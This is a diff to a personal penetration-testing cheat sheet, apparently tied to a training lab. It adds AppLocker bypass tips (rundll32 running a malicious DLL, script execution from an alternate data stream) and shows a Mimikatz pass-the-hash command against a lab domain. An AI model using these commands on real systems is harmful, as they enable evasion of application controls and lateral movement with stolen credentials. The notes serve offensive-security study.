deletehead/the_hax/every_villain_is_LEMONS.md

 ## App Whitelisting Bypasses
 - If default Applocker rules are applied, this means you can bypass by copying bins into `C:\Windows\Temp\` and similar writable folders for to execute.
+- You can also use native bins such as `rundll` to get code exec: `rundll32 myevil.dll,pwnFunction`
+- Use an alternate data stream: `C:\path\to\writable\file.log:evil.js`
+- Check if there's a 3rd party scripting engine such as python

 ## Mimikatz
 You can wrap these in for ex. `PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:lemons /domain:dollarcorp.moneycorp.local /ntlm:NThashHERE /run:powershell.exe`